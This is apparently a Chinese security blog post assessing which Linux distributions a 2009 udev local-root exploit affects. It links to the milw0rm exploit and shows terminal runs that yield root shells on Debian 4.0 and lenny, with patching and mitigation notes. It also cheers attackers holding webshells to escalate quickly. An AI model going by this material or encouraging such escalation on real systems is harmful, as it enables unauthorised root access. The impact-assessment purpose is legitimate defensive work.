linux udev exploit影响面确认
来源:素包子
exp 在 http://www.milw0rm.com/exploits/8478 又是一场血雨腥风,只是这东西用完痕迹还不少 :)
同时几个主流发行版已经发布了新的udev程序。(2.4内核系统不受影响)
经过一番测试,我个人认为这个是有史以来最爽的linux local root exploit,通杀X86和X64架构下N个发行版的N个大版本和子版本,太牛了……看来linux下挖应用层程序的漏洞更有价值。
3……2……1……GO ! 管理员开始打补丁(给哪些机器打?打的结果如何?新装系统还会有吗?软件资产管理系统到底做的如何?这些都是安全人员的挑战。庆幸的是,打这个补丁不需要重启系统),拿着webshell的嘿嘿们赶紧local root,有肉鸡的也帮忙升级下udev吧。
我把手上的几个系统过了一遍,结果如下 (debian和ubuntu同源,)
Debian 4.0 x86:
backup@web:~/…$ sh a 1414
suid.c: In function ‘main’:
suid.c:3: warning: incompatible implicit declaration of built-in function ‘execl’
sh-2.05b# dpkg -l | grep udev
ii udev 0.105-4 /dev/ and hotplug management daemon
sh-2.05b# uname -a
Linux web 2.6.18-5-686 #1 SMP Wed Sep 26 17:54:59 UTC 2007 i686 GNU/Linux
sh-2.05b# cat /etc/debian_version
4.0
Debian lenny x86:
libuuid@debian:~$ sh a 890
suid.c: In function 鈥榤ain鈥?
suid.c:3: warning: incompatible implicit declaration of built-in function 鈥榚xecl鈥?
sh-3.1# id
uid=0(root) gid=0(root) groups=105(libuuid)
sh-3.1# cat /etc/debian_version
lenny/sid
sh-3.1# dpkg -l | grep udev
ii udev 0.114-2 /dev/ and hotplug management daemon
Debian lenny x64 –>今天已经升级过了:
reiay@oo2:/tmp$ ./udev 1422
sh-3.2$ id
uid=1000(reiay) gid=1000(reiay) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(reiay)
reiay@oo2:~$ dpkg -l | grep udev
ii udev 0.125-7+lenny1 /dev/ and hotplug management daemon
RHEL:
RHEL 5.3 x86/x64 确认可以被成功攻击,我猜测5.2 5.1 5.0也不会幸免。
RHEL 4.x x86 x64 http://rhn.redhat.com/errata/RHSA-2009-0427.html 不受影响
最后不得不说一句,各位看官的跳板机赶紧升级,grsecurity帮我们规避了这次风险,cool!看来关键非高压机器部署高级安全策略还是值得的。
udev[11037]: segfault at 0 ip ac6b949b sp b7f7ae98 error 4 in libc-2.5.so[ac68c000+13e000]
udev[11370]: segfault at 0 ip 9b80c49b sp b120c868 error 4 in libc-2.5.so[9b7df000+13e000]